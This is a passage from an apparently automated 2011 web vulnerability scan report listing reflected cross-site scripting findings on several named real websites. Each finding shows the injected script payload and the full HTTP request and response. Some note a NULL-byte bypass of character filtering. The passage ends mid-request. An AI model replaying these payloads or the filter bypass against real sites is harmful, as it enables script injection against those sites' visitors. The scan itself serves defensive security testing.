3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e was submitted in the REST URL parameter 8. This input was echoed as 33b85<img src=a onerror=alert(1)>c54be653d5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http:33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:16 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http:33b85<img src=a onerror=alert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:6013
...[SNIP]...
3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062 was submitted in the REST URL parameter 9. This input was echoed as 37922<img src=a onerror=alert(1)>f402d1ff062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:20 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com37922<img src=a onerror=alert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:6
...[SNIP]...
3.33. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cds.sun.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6855a--><script>alert(1)</script>bc4102ec8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1 HTTP/1.1
Host: cds.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:33 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 20208
Set-Cookie: sid=prDf2DxIwjnf2nEhKhFWJizn0QNA097gYG49cPqWI_fU2HjsA00=; path=/
Set-Cookie: pgid=yYdgaHqkkjVSR0EUPIQsoQ3D0000f9cuKriS; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo
...[SNIP]...
elimiter="&" parametername="goto" currenturl="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1&ProductUUID=pGqJ_hCwj_AAAAEtB8oADqmS&ProductID=pGqJ_hCwj_AAAAEtB8oADqmS&Origin=ViewProductDetail-Start" -->
...[SNIP]...
3.34. https://client.trafficshaping.com/signin [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /signin

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b192"><script>alert(1)</script>32cca89645832eced was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin?email=1b192"><script>alert(1)</script>32cca89645832eced&password=&action=login HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: http://trafficshaping.com/
Cache-Control: max-age=0
Origin: http://trafficshaping.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:44:47 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4659

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - Sign into Your Account</title>
<meta name="description" conten
...[SNIP]...
<input type="text" size="30" name="email" value="1b192"><script>alert(1)</script>32cca89645832eced" />
...[SNIP]...
3.35. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0070e78<a>271d7883f11 was submitted in the REST URL parameter 1. This input was echoed as 70e78<a>271d7883f11 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>271d7883f11/">weblog%0070e78<a>271d7883f11</a>
...[SNIP]...
3.36. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dcea7"><script>alert(1)</script>512fbcc591d was submitted in the REST URL parameter 1. This input was echoed as dcea7"><script>alert(1)</script>512fbcc591d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/">
...[SNIP]...
3.37. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01ec<a>2a3ca83c34f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:20:17 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/fasterc01ec<a>2a3ca83c34f</h1>
...[SNIP]...
3.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00fa627<a>784e947c10e was submitted in the REST URL parameter 1. This input was echoed as fa627<a>784e947c10e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:50 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>784e947c10e/">weblog%00fa627<a>784e947c10e</a>
...[SNIP]...
3.39. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0078f44"><script>alert(1)</script>c42523ab52d was submitted in the REST URL parameter 1. This input was echoed as 78f44"><script>alert(1)</script>c42523ab52d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:49 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/">
...[SNIP]...
3.40. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f526a<a>bc4d18aee79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:21:27 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:21:28 GMT
Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/againf526a<a>bc4d18aee79/</h1>
...[SNIP]...
3.41. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8539"><script>alert(1)</script>90e6230aa36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8539\"><script>alert(1)</script>90e6230aa36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?d8539"><script>alert(1)</script>90e6230aa36=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 26 Feb 2011 23:20:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 214711

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?d8539\"><script>alert(1)</script>90e6230aa36=1#preview" method="post">
...[SNIP]...
3.42. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2 was submitted in the key parameter. This input was echoed as 954f9"><x style=x:expression(alert(1))>935c7211ee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:57 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=rTgXMMJ19hpxRmQBeHTZpBSHLmdhQwpUS9D079bkV7zEURAZjdB9!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="key" value="453849B62CAB589517473EC368BF9542954f9"><x style=x:expression(alert(1))>935c7211ee2">
...[SNIP]...
3.43. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Issue detail

The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315 was submitted in the partnerref parameter. This input was echoed as 99c8f"><x style=x:expression(alert(1))>81a40639315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=7cDI022cgrDsLBgCWczqE6wL9UAd4cjBPhMG2cmQDAsmDcV7RZYq!-1586332666; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert(1))>81a40639315">
...[SNIP]...
3.44. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Issue detail

The value of the sourcepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 was submitted in the sourcepage parameter. This input was echoed as ab0db"><x style=x:expression(alert(1))>113da7be2a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=registerab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:17 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=62BqOkDMbxlMQz6LJa9JVd0qcMfDA1sqzBfibypGJraqoBW2Rf32!-1281997819; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert(1))>113da7be2a3">
...[SNIP]...
3.45. http://init.zopim.com/register [mID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.zopim.com
Path:   /register

Issue detail

The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload eb22e<script>alert(1)</script>85708136ac4ac84a6 was submitted in the mID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /register?swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F9%2E0%2E597%2E98%20Safari%2F534%2E13&jsVer=0%2E4%2E0&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6&ref=http%3A%2F%2Fwww%2Ethedetroitbureau%2Ecom%2Fabout%2Dus%2F&tabId=%5Fflash%5F28853bf0ac29099fa00d4de19cf16898206ee90c&accountKey=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&title=SEO%20Company%20USA%2C%20Michigan%20Web%20Design%20Services%2C%20Print%20Design%2C%20Flash%20Designing%2C%20Website%20design%20Companies%20Novi%2C%20E%2DCommerce%20Designer&url=http%3A%2F%2Fwww%2Esti%2Dcs%2Ecom%2F HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
